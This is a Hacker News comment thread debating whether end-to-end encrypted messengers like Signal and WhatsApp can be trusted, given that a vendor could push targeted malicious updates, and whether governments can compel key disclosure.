Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

IMO the difference is mostly theoretical anyway. Despite the fancy HSMs and end-to-end encryption, if Signal or Whatsapp wanted to read your messages they trivially could - just push an app update to you that sends all of your messages to them.

It's more risky in terms of getting caught, but probably not hugely so if you do it in a way that has plausible deniability.

I think you pretty much have to trust the app supplier. Which in this case, I do not.



Pushing a malicious app update creates an inspectable artifact. Researchers can discover exactly when it happened and therefore who is vulnerable and which messages.

This is a much much much better situation than handing someone your keys and letting them MITM you at any time with no hope of knowing.


You're not thinking sneakily enough. Obviously you wouldn't push a visibly malicious app update to everyone. Instead you make it so that you can push malicious code to specific users. Then all researchers can say is "it's a bit suspicious that this webview has access to Java APIs" and you just need to say "it's needed so we can get your app version" or whatever. They'll never be able to actually see you reading the messages, unless you happen to be very stupid and target a security researcher.

I agree it's definitely better to do proper e2e encryption like WhatsApp / Signal do, but I don't think we should pretend they are magically fully secure against this attack.


Apple doesn’t allow it?


As far as I know they do. You aren't allowed to dynamically load binary code but there's nothing against scripting or using JS in webviews.


IANAL but the difference seems to be gigantic. If the secret key is stored on a company server, then that company can be subpoenaed for it. If it's not on the company's server, the client's endpoint has to be compromised (e.g. by a police raid or by electronic surveillance). The former is much easier than the latter. I don't think government authorities can force companies to actively eavesdrop on their clients by pushing malware through their update mechanism to a client's device, at least not officially in non-authoritarian countries with due process.


>If it's not on the company's server

If. Just recently there was a news about how meta bruteforcing localhost of all its users to hack their devices (https://localmess.github.io/). And now someone seriously suggests to believe that meta does not collect private keys on its servers?

Moreover, I think that now corporations don't even have an option not to steal keys from users: you either have their keys or go to jail. And if you have the keys, but users think you don't and trust all their secrets - that's even better.

And if you think government authorities can't do something, look what happened to Alexey Pertsev. A criminal uses your tool to ensure their privacy? You're going to jail. So in today's world, it's better to have keys on your server, even if you're not going to use them. Because at some point, you might be asked for them and refusing (ore not having one) will mean jail time.


> I don't think government authorities can force companies to actively eavesdrop on their clients by pushing malware through their update mechanism to a client's device, at least not officially in non-authoritarian countries with due process.

Yeah unfortunately that list no longer includes countries like the UK and Australia.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: